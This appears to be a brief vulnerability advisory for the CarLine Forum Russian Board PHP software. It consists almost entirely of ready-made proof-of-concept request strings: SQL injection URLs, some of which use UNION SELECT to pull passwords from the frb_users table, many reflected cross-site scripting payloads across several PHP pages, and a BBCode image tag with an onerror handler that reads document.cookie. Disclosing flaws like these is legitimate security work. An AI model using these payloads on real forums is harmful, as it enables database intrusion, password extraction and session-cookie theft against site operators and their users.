CarLine Forum Russian Board Multiple Input Validation Vulnerabilities

CarLine Forum Russian Board Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:

SQL injection:
menu_header.php?table_sql[users]=[SQL_CODE]
set.php?name_ig_array[1]=' OR 1=1/*
reply_in.php?subject_reply=1&name_reply=1'&message=1&email_reply=1&t=1
reply_in.php?subject_reply=1&name_reply=1&message=1&email_reply=1'&t=1
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*
memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[SQL]
memory.php?board_user_cook=1&board_user_id=1&board_user_passw=1&table_sql[users]=[DB].[TBL]&table_sql[banlist]=[SQL]
line.php?board_user_id=1&board_user_cook=1&table_sql[users]=[SQL]
line.php?table_sql[online]=[SQL]
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1'
line.php?table_sql[online]=[DB].[TBL]&board_user_name_us=1&url=1'
in.php?name_new=1'&subject_new=1&message=1&email_new=1&t=1
in.php?name_new=1&subject_new=1&message=1&email_new=1'&t=1
enter.php?sid='
enter.php?sid=1&passw='

Cross-site scripting:
menu_footer.php?rows_all=><script>alert("XSS");</script>
menu_footer.php?color_fon_info=><script>alert("XSS");</script>
menu_footer.php?target=><script>alert("XSS");</script>
menu_footer.php?patch_images="><script>alert("XSS");</script>
menu_footer.php?text_poisk_form="><script>alert("XSS");</script>
menu_header.php?board_user_name=<script>alert("XSS");</script>
menu_header.php?board_user_name=1&color_panel_edit=><script>alert("XSS");</script>
menu_header.php?target=><script>alert("XSS");</script>
menu_header.php?patch_images="><script>alert("XSS");</script>
menu_header.php?font_color_panel=><script>alert("XSS");</script>
menu_header.php?body_color_forum=><script>alert("XSS");</script>
menu_tema.php?body_color_forum=><script>alert("XSS");</script>
menu_tema.php?width_forum=><script>alert("XSS");</script>
menu_tema.php?cat=><script>alert("XSS");</script>
search.php?text_poisk=<script>alert("XSS");</script>
set.php?name_ig_array[]=<script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
new.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]="><script>alert("XSS");</script>
edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array[1]="><script>alert("XSS");</script>

HTML injection:
[img]wink.gif onerror=javascript:alert(document.cookie);[/img]